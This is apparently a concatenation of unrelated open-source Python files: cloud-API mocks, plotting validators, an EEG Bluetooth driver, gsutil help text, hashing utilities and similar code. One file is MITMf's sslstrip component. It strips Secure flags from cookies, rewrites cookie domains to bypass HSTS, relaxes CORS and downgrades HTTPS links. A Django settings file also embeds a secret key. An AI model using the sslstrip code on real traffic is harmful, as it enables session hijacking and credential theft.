self.treeViewModel.append_data(datarows)
datarows = []
self.yieldCurrentThread()
responseItems = [m or '' for m in list(row)]
Id = str(row[ResponsesTable.ID])
self.lastId = int(Id)
if str(responseItems[ResponsesTable.CONFIRMED]).lower() in ('y', '1'):
confirmed = "Yes"
else:
confirmed = ""
responseItems[ResponsesTable.CONFIRMED] = confirmed
datarows.append(responseItems)
self.treeViewModel.append_data(datarows)
except Exception as error:
print(('FIX ME! ERROR: %s' % (traceback.format_exc(error))))
finally:
self.qlock.unlock()
if self.doCallback:
self.doCallback = False
self.callbackObj.emit(SIGNAL('fillResponsesFinished()'))
|
jotes/moto
|
refs/heads/master
|
moto/ec2/responses/key_pairs.py
|
10
|
from __future__ import unicode_literals
import six
from moto.core.responses import BaseResponse
from moto.ec2.utils import keypair_names_from_querystring, filters_from_querystring
class KeyPairs(BaseResponse):
def create_key_pair(self):
name = self.querystring.get('KeyName')[0]
keypair = self.ec2_backend.create_key_pair(name)
template = self.response_template(CREATE_KEY_PAIR_RESPONSE)
return template.render(**keypair)
def delete_key_pair(self):
name = self.querystring.get('KeyName')[0]
success = six.text_type(self.ec2_backend.delete_key_pair(name)).lower()
return self.response_template(DELETE_KEY_PAIR_RESPONSE).render(success=success)
def describe_key_pairs(self):
names = keypair_names_from_querystring(self.querystring)
filters = filters_from_querystring(self.querystring)
if len(filters) > 0:
raise NotImplementedError('Using filters in KeyPairs.describe_key_pairs is not yet implemented')
keypairs = self.ec2_backend.describe_key_pairs(names)
template = self.response_template(DESCRIBE_KEY_PAIRS_RESPONSE)
return template.render(keypairs=keypairs)
def import_key_pair(self):
raise NotImplementedError('KeyPairs.import_key_pair is not yet implemented')
DESCRIBE_KEY_PAIRS_RESPONSE = """<DescribeKeyPairsResponse xmlns="http://ec2.amazonaws.com/doc/2013-10-15/">
<requestId>59dbff89-35bd-4eac-99ed-be587EXAMPLE</requestId>
<keySet>
{% for keypair in keypairs %}
<item>
<keyName>{{ keypair.name }}</keyName>
<keyFingerprint>{{ keypair.fingerprint }}</keyFingerprint>
</item>
{% endfor %}
</keySet>
</DescribeKeyPairsResponse>"""
CREATE_KEY_PAIR_RESPONSE = """<CreateKeyPairResponse xmlns="http://ec2.amazonaws.com/doc/2013-10-15/">
<keyName>{{ name }}</keyName>
<keyFingerprint>
{{ fingerprint }}
</keyFingerprint>
<keyMaterial>{{ material }}
</keyMaterial>
</CreateKeyPairResponse>"""
DELETE_KEY_PAIR_RESPONSE = """<DeleteKeyPairResponse xmlns="http://ec2.amazonaws.com/doc/2013-10-15/">
<requestId>59dbff89-35bd-4eac-99ed-be587EXAMPLE</requestId>
<return>{{ success }}</return>
</DeleteKeyPairResponse>"""
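# Illustrative note: create_key_pair() renders CREATE_KEY_PAIR_RESPONSE with
# template.render(**keypair), so the backend keypair is expected to provide the
# 'name', 'fingerprint' and 'material' fields referenced above.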
|
plotly/python-api
|
refs/heads/master
|
packages/python/plotly/plotly/validators/table/cells/_alignsrc.py
|
1
|
import _plotly_utils.basevalidators
class AlignsrcValidator(_plotly_utils.basevalidators.SrcValidator):
def __init__(self, plotly_name="alignsrc", parent_name="table.cells", **kwargs):
super(AlignsrcValidator, self).__init__(
plotly_name=plotly_name,
parent_name=parent_name,
edit_type=kwargs.pop("edit_type", "none"),
role=kwargs.pop("role", "info"),
**kwargs
)
|
byt3bl33d3r/MITMf
|
refs/heads/master
|
core/sslstrip/SSLServerConnection.py
|
26
|
# Copyright (c) 2014-2016 Moxie Marlinspike, Marcello Salvati
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
# USA
#
import logging
import re
import string
from ServerConnection import ServerConnection
from URLMonitor import URLMonitor
from core.logger import logger
formatter = logging.Formatter("%(asctime)s [SSLServerConnection] %(message)s", datefmt="%Y-%m-%d %H:%M:%S")
log = logger().setup_logger("SSLServerConnection", formatter)
class SSLServerConnection(ServerConnection):
'''
For SSL connections to a server, we need to do some additional stripping. First we need
to make note of any relative links, as the server will be expecting those to be requested
via SSL as well. We also want to slip our favicon in here and kill the secure bit on cookies.
'''
cookieExpression = re.compile(r"([ \w\d:#@%/;$()~_?\+-=\\\.&]+); ?Secure", re.IGNORECASE)
cssExpression = re.compile(r"url\(([\w\d:#@%/;$~_?\+-=\\\.&]+)\)", re.IGNORECASE)
iconExpression = re.compile(r"<link rel=\"shortcut icon\" .*href=\"([\w\d:#@%/;$()~_?\+-=\\\.&]+)\".*>", re.IGNORECASE)
linkExpression = re.compile(r"<((a)|(link)|(img)|(script)|(frame)) .*((href)|(src))=\"([\w\d:#@%/;$()~_?\+-=\\\.&]+)\".*>", re.IGNORECASE)
headExpression = re.compile(r"<head>", re.IGNORECASE)
def __init__(self, command, uri, postData, headers, client):
ServerConnection.__init__(self, command, uri, postData, headers, client)
self.urlMonitor = URLMonitor.getInstance()
self.hsts = URLMonitor.getInstance().hsts
def getLogLevel(self):
return logging.INFO
def getPostPrefix(self):
return "SECURE POST"
def handleHeader(self, key, value):
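        # Strip the "Secure" flag from Set-Cookie headers; when HSTS bypass is in
        # use, also rewrite the cookie Domain back to the real hostname and relax
        # Access-Control-Allow-Origin.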
if self.hsts:
if (key.lower() == 'set-cookie'):
newvalues =[]
value = SSLServerConnection.cookieExpression.sub("\g<1>", value)
values = value.split(';')
for v in values:
if v[:7].lower()==' domain':
dominio=v.split("=")[1]
log.debug("Parsing cookie domain parameter: %s"%v)
real = self.urlMonitor.real
if dominio in real:
v=" Domain=%s"%real[dominio]
log.debug("New cookie domain parameter: %s"%v)
newvalues.append(v)
value = ';'.join(newvalues)
if (key.lower() == 'access-control-allow-origin'):
value='*'
else:
if (key.lower() == 'set-cookie'):
value = SSLServerConnection.cookieExpression.sub("\g<1>", value)
ServerConnection.handleHeader(self, key, value)
def stripFileFromPath(self, path):
(strippedPath, lastSlash, file) = path.rpartition('/')
return strippedPath
def buildAbsoluteLink(self, link):
absoluteLink = ""
if ((not link.startswith('http')) and (not link.startswith('/'))):
absoluteLink = "http://"+self.headers['host']+self.stripFileFromPath(self.uri)+'/'+link
log.debug("Found path-relative link in secure transmission: " + link)
log.debug("New Absolute path-relative link: " + absoluteLink)
elif not link.startswith('http'):
absoluteLink = "http://"+self.headers['host']+link
log.debug("Found relative link in secure transmission: " + link)
log.debug("New Absolute link: " + absoluteLink)
if not absoluteLink == "":
absoluteLink = absoluteLink.replace('&', '&')
        self.urlMonitor.addSecureLink(self.client.getClientIP(), absoluteLink)
def replaceCssLinks(self, data):
iterator = re.finditer(SSLServerConnection.cssExpression, data)
for match in iterator:
self.buildAbsoluteLink(match.group(1))
return data
def replaceFavicon(self, data):
match = re.search(SSLServerConnection.iconExpression, data)
if (match != None):
data = re.sub(SSLServerConnection.iconExpression,
"<link rel=\"SHORTCUT ICON\" href=\"/favicon-x-favicon-x.ico\">", data)
else:
data = re.sub(SSLServerConnection.headExpression,
"<head><link rel=\"SHORTCUT ICON\" href=\"/favicon-x-favicon-x.ico\">", data)
return data
def replaceSecureLinks(self, data):
data = ServerConnection.replaceSecureLinks(self, data)
data = self.replaceCssLinks(data)
if (self.urlMonitor.isFaviconSpoofing()):
data = self.replaceFavicon(data)
iterator = re.finditer(SSLServerConnection.linkExpression, data)
for match in iterator:
self.buildAbsoluteLink(match.group(10))
return data
|
ghostwords/localore
|
refs/heads/master
|
localore/blog/migrations/0019_auto_20160325_1159.py
|
1
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('blog', '0018_auto_20160324_1029'),
]
operations = [
migrations.AlterModelOptions(
name='blogindexpage',
options={'verbose_name': 'connections index page'},
),
migrations.AlterModelOptions(
name='blogpage',
options={'verbose_name': 'connection'},
),
]
|
akloster/pysiology
|
refs/heads/master
|
pysiology/muse.py
|
1
|
import time
from collections import defaultdict
import asyncio
from asyncio import coroutine, sleep, async
import bluetooth
import numpy as np
import bcolz
from sample_source import SampleSource
from utils import TSLogger, message
from streamer import StreamerCommand
import json
from command import ServerCommand
import muse_parser
class MuseManager(object):
""" Manages the Muse devices globally. Not tested with multiple devices yet,
though. """
def __init__(self):
self.devices = {}
def connect(self, address):
if address in self.devices:
return self.devices[address].connected.wait()
device = MuseDevice(address)
self.devices[address] = device
asyncio.get_event_loop().create_task(device.run())
return device.connected.wait()
def disconnect(self, address):
self.devices[address].disconnect()
muse_manager = MuseManager()
class MuseDeviceParser(muse_parser.Parser):
def __init__(self, device):
self.device = device
super().__init__()
def receive_value(self, channel, value):
self.device.receive_value(channel, value)
class MuseDevice(object):
channel_names = ["TP9", "AF7", "AF8", "TP10", "LAUX", "RAUX", "battery_percent"]
def __init__(self, addr):
super().__init__()
self.addr = addr
self.record = True
self.sample_count = 0
self.time_offset = None
self.loggers = {}
for channel in self.channel_names:
logger = TSLogger(dtype="int16")
self.loggers[channel] = logger
logger.timing_counter = 0
self.connected = asyncio.Event()
def get_indices(self):
return
@coroutine
def run(self):
yield from self.connect()
@coroutine
def receive_short(self):
for i in range(10):
yield from sleep(0.1)
try:
line = self.socket.recv(1000)
return line
except:
continue
return b""
@coroutine
def try_to_connect(self):
try:
self.socket = bluetooth.BluetoothSocket(bluetooth.RFCOMM)
self.socket.connect((self.addr, 1))
self.socket.setblocking(False)
except bluetooth.BluetoothError as e:
print(e)
return False
# Get hardware/firmware versions,
# useful for debugging with new devices
yield from sleep(0.1)
self.socket.send("v\n")
line = yield from self.receive_short()
        if not line:
return False
print(line.decode("ascii"))
# Preset AB for research mode, 500hz, 16bit
self.socket.send("%AB\n")
yield from sleep(0.1)
# Select 50hz notch filter
self.socket.send("g 408c\n")
yield from sleep(0.05)
self.socket.send("?\n")
line = yield from self.receive_short()
        if not line:
return False
print(line.decode("ascii"))
return True
@coroutine
def connect(self):
while 1:
self.sample_count = 0
print("Trying to connect")
# Loop until a connection is successful
success = yield from self.try_to_connect()
if success:
print("Connection made!")
self.connected.set()
yield from self.read_loop()
else:
print("Connecting to Muse failed")
yield from sleep(3)
@coroutine
def read_loop(self):
""" Reads repeatedly from bluetooth socket, and returns if errors are
deemed unrecoverable. """
error_count = 0
parser = MuseDeviceParser(self)
self.socket.send("s\n")
self.time_offset = time.time()
self.next_keepalive = time.time() + 5
for channel in self.channel_names:
self.loggers[channel].timing_counter = 0
while 1:
if not self.record:
yield from sleep(1)
continue
yield from sleep(0.05)
if self.next_keepalive < time.time():
self.next_keepalive = time.time()+5
self.socket.send("k\n")
try:
buffer = self.socket.recv(10000)
for b in buffer:
parser.send(b)
error_count = 0
except bluetooth.BluetoothError as e:
# Errno 11 is thrown quite often, and usually
# only means that no new data has been sent.
if str(e).startswith("(11"):
error_count += 1
if error_count > 5:
self.socket.close()
return
yield from sleep(0.025)
else:
print("error on reading:", e)
self.socket.close()
yield from sleep(1)
return
def receive_value(self, channel, value):
# Muse doesn't send any timing information, so we assume
        # constant sampling rates: 500 Hz for EEG and 50 Hz for the accelerometer.
        # Battery data arrives much more rarely, so we use the current wall-clock time.
logger = self.loggers[channel]
if channel == "battery_percent":
t = time.time()
elif channel in ["ACCEL1", "ACCEL2"]:
t = self.time_offset + (logger.timing_counter / 50.0)
logger.timing_counter += 1
else:
t = self.time_offset + (logger.timing_counter / 500.0)
logger.timing_counter += 1
logger.log(t, value)
def disconnect(self):
pass
def get_indices(self):
return {k:len(v) for k,v in self.loggers.items()}
class MuseConnectCommand(ServerCommand):
@coroutine
def run(self, **kwargs):
print ("Connecting to Muse...")
address = kwargs['address']
print(address)
yield from muse_manager.connect(address)
yield from self.websocket.send(message(msg="muse_connected"))
class MuseStreamCommand(StreamerCommand):
@coroutine
def run(self, address=None, interval=1.0, **kwargs):
device = muse_manager.devices[address]
msg = dict(mtp="muse_status",
address=address,
status="connecting",
)
yield from device.connected.wait()
print ("Start streaming")
time_start = time.time()
last_indices = device.get_indices()
while not self.cancelled:
yield from sleep(0.2)
msg = dict(mtp="muse_stream",
address=address)
for key,ts in device.loggers.items():
last_index = last_indices[key]
times = ts.times[last_index:]
values = ts.values[last_index:]
if len(values)>0:
msg[key] = [times, values]
last_indices = device.get_indices()
json = message(**msg)
yield from self.websocket.send(json)
|
studio666/gratipay.com
|
refs/heads/master
|
tests/js/utils/auth-helper.py
|
3
|
#!/usr/bin/env python
from __future__ import print_function, unicode_literals
import os
import sys
import uuid
from datetime import timedelta
from aspen.utils import utcnow
import gratipay
from gratipay import wireup
from gratipay.models.participant import Participant
if len(sys.argv) < 2:
sys.exit('Usage: %s <user>' % sys.argv[0])
db = Participant.db = wireup.db(wireup.env())
gratipay.RESTRICTED_USERNAMES = os.listdir('./www/')
username = sys.argv[1]
session_token = uuid.uuid4().hex
session_expires = utcnow() + timedelta(hours=6)
try:
participant = Participant.from_username(username)
participant.db = db
except:
participant = Participant.with_random_username()
participant.db = db
participant.change_username(username)
participant.set_as_claimed()
participant.update_session(session_token, session_expires)
print(session_token)
|
SummerLW/Perf-Insight-Report
|
refs/heads/test
|
third_party/gsutil/gslib/addlhelp/wildcards.py
|
22
|
# -*- coding: utf-8 -*-
# Copyright 2012 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Additional help about wildcards."""
from __future__ import absolute_import
from gslib.help_provider import HelpProvider
_DETAILED_HELP_TEXT = ("""
<B>DESCRIPTION</B>
gsutil supports URI wildcards. For example, the command:
gsutil cp gs://bucket/data/abc* .
will copy all objects that start with gs://bucket/data/abc followed by any
number of characters within that subdirectory.
<B>DIRECTORY BY DIRECTORY VS RECURSIVE WILDCARDS</B>
The "*" wildcard only matches up to the end of a path within
a subdirectory. For example, if bucket contains objects
named gs://bucket/data/abcd, gs://bucket/data/abcdef,
and gs://bucket/data/abcxyx, as well as an object in a sub-directory
(gs://bucket/data/abc/def) the above gsutil cp command would match the
first 3 object names but not the last one.
If you want matches to span directory boundaries, use a '**' wildcard:
gsutil cp gs://bucket/data/abc** .
will match all four objects above.
Note that gsutil supports the same wildcards for both objects and file names.
Thus, for example:
gsutil cp data/abc* gs://bucket
will match all names in the local file system. Most command shells also
  support wildcarding, so if you run the above command, your shell is probably
  expanding the matches before gsutil runs. However, most shells do not
support recursive wildcards ('**'), and you can cause gsutil's wildcarding
support to work for such shells by single-quoting the arguments so they
don't get interpreted by the shell before being passed to gsutil:
gsutil cp 'data/abc**' gs://bucket
<B>BUCKET WILDCARDS</B>
You can specify wildcards for bucket names within a single project. For
example:
gsutil ls gs://data*.example.com
will list the contents of all buckets whose name starts with "data" and
ends with ".example.com" in the default project. The -p option can be used
to specify a project other than the default. For example:
gsutil ls -p other-project gs://data*.example.com
You can also combine bucket and object name wildcards. For example this
command will remove all ".txt" files in any of your Google Cloud Storage
buckets in the default project:
gsutil rm gs://*/**.txt
<B>OTHER WILDCARD CHARACTERS</B>
In addition to '*', you can use these wildcards:
?
Matches a single character. For example "gs://bucket/??.txt"
only matches objects with two characters followed by .txt.
[chars]
Match any of the specified characters. For example
"gs://bucket/[aeiou].txt" matches objects that contain a single vowel
character followed by .txt
[char range]
Match any of the range of characters. For example
"gs://bucket/[a-m].txt" matches objects that contain letters
a, b, c, ... or m, and end with .txt.
You can combine wildcards to provide more powerful matches, for example:
gs://bucket/[a-m]??.j*g
<B>DIFFERENT BEHAVIOR FOR "DOT" FILES IN LOCAL FILE SYSTEM</B>
Per standard Unix behavior, the wildcard "*" only matches files that don't
start with a "." character (to avoid confusion with the "." and ".."
directories present in all Unix directories). gsutil provides this same
behavior when using wildcards over a file system URI, but does not provide
this behavior over cloud URIs. For example, the following command will copy
all objects from gs://bucket1 to gs://bucket2:
gsutil cp gs://bucket1/* gs://bucket2
but the following command will copy only files that don't start with a "."
from the directory "dir" to gs://bucket1:
gsutil cp dir/* gs://bucket1
<B>EFFICIENCY CONSIDERATION: USING WILDCARDS OVER MANY OBJECTS</B>
It is more efficient, faster, and less network traffic-intensive
to use wildcards that have a non-wildcard object-name prefix, like:
gs://bucket/abc*.txt
than it is to use wildcards as the first part of the object name, like:
gs://bucket/*abc.txt
This is because the request for "gs://bucket/abc*.txt" asks the server to send
back the subset of results whose object name start with "abc" at the bucket
root, and then gsutil filters the result list for objects whose name ends with
".txt". In contrast, "gs://bucket/*abc.txt" asks the server for the complete
list of objects in the bucket root, and then filters for those objects whose
name ends with "abc.txt". This efficiency consideration becomes increasingly
noticeable when you use buckets containing thousands or more objects. It is
sometimes possible to set up the names of your objects to fit with expected
wildcard matching patterns, to take advantage of the efficiency of doing
server-side prefix requests. See, for example "gsutil help prod" for a
concrete use case example.
<B>EFFICIENCY CONSIDERATION: USING MID-PATH WILDCARDS</B>
Suppose you have a bucket with these objects:
gs://bucket/obj1
gs://bucket/obj2
gs://bucket/obj3
gs://bucket/obj4
gs://bucket/dir1/obj5
gs://bucket/dir2/obj6
If you run the command:
gsutil ls gs://bucket/*/obj5
gsutil will perform a /-delimited top-level bucket listing and then one bucket
listing for each subdirectory, for a total of 3 bucket listings:
GET /bucket/?delimiter=/
GET /bucket/?prefix=dir1/obj5&delimiter=/
GET /bucket/?prefix=dir2/obj5&delimiter=/
The more bucket listings your wildcard requires, the slower and more expensive
it will be. The number of bucket listings required grows as:
- the number of wildcard components (e.g., "gs://bucket/a??b/c*/*/d"
has 3 wildcard components);
- the number of subdirectories that match each component; and
- the number of results (pagination is implemented using one GET
request per 1000 results, specifying markers for each).
If you want to use a mid-path wildcard, you might try instead using a
recursive wildcard, for example:
gsutil ls gs://bucket/**/obj5
This will match more objects than "gs://bucket/*/obj5" (since it spans
directories), but is implemented using a delimiter-less bucket listing
request (which means fewer bucket requests, though it will list the entire
bucket and filter locally, so that could require a non-trivial amount of
network traffic).
""")
class CommandOptions(HelpProvider):
"""Additional help about wildcards."""
# Help specification. See help_provider.py for documentation.
help_spec = HelpProvider.HelpSpec(
help_name='wildcards',
help_name_aliases=['wildcard', '*', '**'],
help_type='additional_help',
help_one_line_summary='Wildcard Names',
help_text=_DETAILED_HELP_TEXT,
subcommand_help_text={},
)
|
mklinker/uavcan
|
refs/heads/master
|
pyuavcan/pyuavcan/dsdl/signature.py
|
15
|
#
# UAVCAN DSDL signature computation
#
# Copyright (C) 2014 Pavel Kirienko <pavel.kirienko@gmail.com>
#
from __future__ import division, absolute_import, print_function, unicode_literals
#
# CRC-64-WE
# Description: http://reveng.sourceforge.net/crc-catalogue/17plus.htm#crc.cat-bits.64
# Initial value: 0xFFFFFFFFFFFFFFFF
# Poly: 0x42F0E1EBA9EA3693
# Reverse: no
# Output xor: 0xFFFFFFFFFFFFFFFF
# Check: 0x62EC59E3F1A4F00A
#
class Signature:
'''
This class implements the UAVCAN DSDL signature hash function. Please refer to the specification for details.
'''
MASK64 = 0xFFFFFFFFFFFFFFFF
POLY = 0x42F0E1EBA9EA3693
def __init__(self, extend_from=None):
'''
extend_from Initial value (optional)
'''
if extend_from is not None:
self._crc = (int(extend_from) & Signature.MASK64) ^ Signature.MASK64
else:
self._crc = Signature.MASK64
def add(self, data_bytes):
'''Feed ASCII string or bytes to the signature function'''
try:
if isinstance(data_bytes, basestring): # Python 2.7 compatibility
data_bytes = map(ord, data_bytes)
except NameError:
if isinstance(data_bytes, str): # This branch will be taken on Python 3
data_bytes = map(ord, data_bytes)
for b in data_bytes:
self._crc ^= (b << 56) & Signature.MASK64
for _ in range(8):
if self._crc & (1 << 63):
self._crc = ((self._crc << 1) & Signature.MASK64) ^ Signature.POLY
else:
self._crc <<= 1
def get_value(self):
'''Returns integer signature value'''
return (self._crc & Signature.MASK64) ^ Signature.MASK64
def compute_signature(data):
'''
One-shot signature computation for ASCII string or bytes.
    Returns the integer signature value.
'''
s = Signature()
s.add(data)
return s.get_value()
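# A minimal usage sketch (the expected value is the CRC-64/WE check value quoted
# in the header comment above):
#
#     assert compute_signature(b'123456789') == 0x62EC59E3F1A4F00A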
# if __name__ == '__main__':
if 1:
s = Signature()
s.add(b'123')
s.add('456789')
assert s.get_value() == 0x62EC59E3F1A4F00A
|
tarvitz/django-actions
|
refs/heads/master
|
settings.py
|
1
|
# Django settings for actions project.
import os
import sys
ROOT_PATH = os.path.dirname(__file__)
#if not ROOT_PATH in sys.path:
# sys.path.insert(0, ROOT_PATH)
def rel_path(path):
return os.path.join(ROOT_PATH, path)
DEBUG = True
TEMPLATE_DEBUG = DEBUG
ADMINS = (
# ('Your Name', 'your_email@example.com'),
)
MANAGERS = ADMINS
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3', # Add 'postgresql_psycopg2', 'postgresql', 'mysql', 'sqlite3' or 'oracle'.
'NAME': 'db.sqlite3', # Or path to database file if using sqlite3.
'USER': '', # Not used with sqlite3.
'PASSWORD': '', # Not used with sqlite3.
'HOST': '', # Set to empty string for localhost. Not used with sqlite3.
'PORT': '', # Set to empty string for default. Not used with sqlite3.
}
}
# Local time zone for this installation. Choices can be found here:
# http://en.wikipedia.org/wiki/List_of_tz_zones_by_name
# although not all choices may be available on all operating systems.
# On Unix systems, a value of None will cause Django to use the same
# timezone as the operating system.
# If running in a Windows environment this must be set to the same as your
# system time zone.
TIME_ZONE = 'America/Chicago'
# Language code for this installation. All choices can be found here:
# http://www.i18nguy.com/unicode/language-identifiers.html
LANGUAGE_CODE = 'en-us'
SITE_ID = 1
# If you set this to False, Django will make some optimizations so as not
# to load the internationalization machinery.
USE_I18N = True
# If you set this to False, Django will not format dates, numbers and
# calendars according to the current locale
USE_L10N = True
# Absolute filesystem path to the directory that will hold user-uploaded files.
# Example: "/home/media/media.lawrence.com/media/"
MEDIA_ROOT = ''
# URL that handles the media served from MEDIA_ROOT. Make sure to use a
# trailing slash.
# Examples: "http://media.lawrence.com/media/", "http://example.com/media/"
MEDIA_URL = ''
# Absolute path to the directory static files should be collected to.
# Don't put anything in this directory yourself; store your static files
# in apps' "static/" subdirectories and in STATICFILES_DIRS.
# Example: "/home/media/media.lawrence.com/static/"
STATIC_ROOT = ''
# URL prefix for static files.
# Example: "http://media.lawrence.com/static/"
STATIC_URL = '/static/'
# URL prefix for admin static files -- CSS, JavaScript and images.
# Make sure to use a trailing slash.
# Examples: "http://foo.com/static/admin/", "/static/admin/".
ADMIN_MEDIA_PREFIX = '/static/admin/'
# Additional locations of static files
STATICFILES_DIRS = (
# Put strings here, like "/home/html/static" or "C:/www/django/static".
# Always use forward slashes, even on Windows.
# Don't forget to use absolute paths, not relative paths.
)
# List of finder classes that know how to find static files in
# various locations.
STATICFILES_FINDERS = (
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
# 'django.contrib.staticfiles.finders.DefaultStorageFinder',
)
# Make this unique, and don't share it with anybody.
SECRET_KEY = '(b&1(p19+9ah0hx)co^_z*ld$09v+%n+*o&p)4h6ux-fa)qv_p'
# List of callables that know how to import templates from various sources.
TEMPLATE_LOADERS = (
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
# 'django.template.loaders.eggs.Loader',
)
MIDDLEWARE_CLASSES = (
'django.middleware.common.CommonMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
)
ROOT_URLCONF = 'urls'
TEMPLATE_DIRS = (
# Put strings here, like "/home/html/django_templates" or "C:/www/django/templates".
# Always use forward slashes, even on Windows.
# Don't forget to use absolute paths, not relative paths.
rel_path('templates'),
)
INSTALLED_APPS = (
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.sites',
'django.contrib.messages',
'django.contrib.staticfiles',
# Uncomment the next line to enable the admin:
'django.contrib.admin',
# Uncomment the next line to enable admin documentation:
# 'django.contrib.admindocs',
'django_actions',
'apps.example',
)
# A sample logging configuration. The only tangible logging
# performed by this configuration is to send an email to
# the site admins on every HTTP 500 error.
# See http://docs.djangoproject.com/en/dev/topics/logging for
# more details on how to customize your logging configuration.
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'handlers': {
'mail_admins': {
'level': 'ERROR',
'class': 'django.utils.log.AdminEmailHandler'
}
},
'loggers': {
'django.request': {
'handlers': ['mail_admins'],
'level': 'ERROR',
'propagate': True,
},
}
}
|
infoxchange/django-guardian
|
refs/heads/devel
|
extras.py
|
85
|
import _ast
import os
import sys
from setuptools import Command
#from pyflakes.scripts import pyflakes as flakes
def check(filename):
from pyflakes import reporter as mod_reporter
from pyflakes.checker import Checker
codeString = open(filename).read()
reporter = mod_reporter._makeDefaultReporter()
# First, compile into an AST and handle syntax errors.
try:
tree = compile(codeString, filename, "exec", _ast.PyCF_ONLY_AST)
except SyntaxError:
value = sys.exc_info()[1]
msg = value.args[0]
(lineno, offset, text) = value.lineno, value.offset, value.text
# If there's an encoding problem with the file, the text is None.
if text is None:
# Avoid using msg, since for the only known case, it contains a
# bogus message that claims the encoding the file declared was
# unknown.
reporter.unexpectedError(filename, 'problem decoding source')
else:
reporter.syntaxError(filename, msg, lineno, offset, text)
return 1
except Exception:
reporter.unexpectedError(filename, 'problem decoding source')
return 1
else:
# Okay, it's syntactically valid. Now check it.
lines = codeString.splitlines()
warnings = Checker(tree, filename)
warnings.messages.sort(key=lambda m: m.lineno)
real_messages = []
for m in warnings.messages:
line = lines[m.lineno - 1]
if 'pyflakes:ignore' in line.rsplit('#', 1)[-1]:
# ignore lines with pyflakes:ignore
pass
else:
real_messages.append(m)
reporter.flake(m)
return len(real_messages)
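# A minimal usage sketch (hypothetical path): check() returns the number of
# pyflakes warnings that are not suppressed with a trailing "pyflakes:ignore"
# comment.
#
#     n_warnings = check('guardian/admin.py')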
class RunFlakesCommand(Command):
"""
    Runs pyflakes against the guardian codebase.
"""
description = "Check sources with pyflakes"
user_options = []
def initialize_options(self):
pass
def finalize_options(self):
pass
def run(self):
try:
import pyflakes # pyflakes:ignore
except ImportError:
sys.stderr.write("No pyflakes installed!\n")
sys.exit(-1)
thisdir = os.path.dirname(__file__)
guardiandir = os.path.join(thisdir, 'guardian')
warns = 0
# Define top-level directories
for topdir, dirnames, filenames in os.walk(guardiandir):
            paths = (os.path.join(topdir, f) for f in filenames if f.endswith('.py'))
for path in paths:
if path.endswith('tests/__init__.py'):
# ignore that module (it should only gather test cases with *)
continue
warns += check(path)
if warns > 0:
sys.stderr.write("ERROR: Finished with total %d warnings.\n" % warns)
sys.exit(1)
else:
print("No problems found in source codes.")
|
akionakamura/scikit-learn
|
refs/heads/master
|
sklearn/externals/joblib/hashing.py
|
194
|
"""
Fast cryptographic hash of Python objects, with a special case for fast
hashing of numpy arrays.
"""
# Author: Gael Varoquaux <gael dot varoquaux at normalesup dot org>
# Copyright (c) 2009 Gael Varoquaux
# License: BSD Style, 3 clauses.
import warnings
import pickle
import hashlib
import sys
import types
import struct
import io
if sys.version_info[0] < 3:
Pickler = pickle.Pickler
else:
Pickler = pickle._Pickler
class _ConsistentSet(object):
""" Class used to ensure the hash of Sets is preserved
        regardless of the order of its items.
"""
def __init__(self, set_sequence):
self._sequence = sorted(set_sequence)
class _MyHash(object):
""" Class used to hash objects that won't normally pickle """
def __init__(self, *args):
self.args = args
class Hasher(Pickler):
""" A subclass of pickler, to do cryptographic hashing, rather than
pickling.
"""
def __init__(self, hash_name='md5'):
self.stream = io.BytesIO()
Pickler.__init__(self, self.stream, protocol=2)
# Initialise the hash obj
self._hash = hashlib.new(hash_name)
def hash(self, obj, return_digest=True):
try:
self.dump(obj)
except pickle.PicklingError as e:
warnings.warn('PicklingError while hashing %r: %r' % (obj, e))
dumps = self.stream.getvalue()
self._hash.update(dumps)
if return_digest:
return self._hash.hexdigest()
def save(self, obj):
if isinstance(obj, (types.MethodType, type({}.pop))):
# the Pickler cannot pickle instance methods; here we decompose
# them into components that make them uniquely identifiable
if hasattr(obj, '__func__'):
func_name = obj.__func__.__name__
else:
func_name = obj.__name__
inst = obj.__self__
if type(inst) == type(pickle):
obj = _MyHash(func_name, inst.__name__)
elif inst is None:
# type(None) or type(module) do not pickle
obj = _MyHash(func_name, inst)
else:
cls = obj.__self__.__class__
obj = _MyHash(func_name, inst, cls)
Pickler.save(self, obj)
# The dispatch table of the pickler is not accessible in Python
# 3, as these lines are only bugware for IPython, we skip them.
def save_global(self, obj, name=None, pack=struct.pack):
# We have to override this method in order to deal with objects
# defined interactively in IPython that are not injected in
# __main__
kwargs = dict(name=name, pack=pack)
if sys.version_info >= (3, 4):
del kwargs['pack']
try:
Pickler.save_global(self, obj, **kwargs)
except pickle.PicklingError:
Pickler.save_global(self, obj, **kwargs)
module = getattr(obj, "__module__", None)
if module == '__main__':
my_name = name
if my_name is None:
my_name = obj.__name__
mod = sys.modules[module]
if not hasattr(mod, my_name):
                # IPython doesn't inject the variables defined
# interactively in __main__
setattr(mod, my_name, obj)
dispatch = Pickler.dispatch.copy()
# builtin
dispatch[type(len)] = save_global
# type
dispatch[type(object)] = save_global
# classobj
dispatch[type(Pickler)] = save_global
# function
dispatch[type(pickle.dump)] = save_global
